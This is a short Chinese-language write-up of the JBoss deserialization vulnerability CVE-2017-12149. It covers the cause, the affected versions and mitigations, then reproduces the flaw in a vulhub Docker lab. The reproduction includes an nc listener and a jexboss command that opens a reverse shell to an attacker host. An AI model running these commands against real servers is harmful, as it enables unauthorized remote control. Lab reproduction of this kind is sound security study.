目录
CVE-2017-12149 jboss反序列化漏洞
漏洞简介
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。
2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。
影响的版本
5.x和6.x版本的JBOSSAS
漏洞防护建议
有效解决方案:升级到JBOSS AS7版本临时解决方案:
1、不需要 http-invoker.sar 组件的用户可直接删除此组件;
2、用于对 http invoker 组件进行访问控制。
以上都是前期需要了解的漏洞类型,然后要对漏洞有一定的了解,漏洞利用成功性会比较大,下面是漏洞的复现
漏洞复现
利用dockerfile.yml文件搭建镜像
sudo docker-compose up -d
通过镜像创建容器
sudo docker run -d -p 8080:8080 --name jboss vulhub/jboss:as-6.1.0
查看创建的容器
sudo docker ps
漏洞复现
查看环境
环境搭建成功
开启端口监听
nc -lvp 9999
监听端口9999
使用jexboss工具进行反弹shell
python jexboss.py -u http://192.168.150.131:8080 -A --reverse-host 192.168.150.132:9999 -results jboss.txt
成功反弹shell
成功拿到权限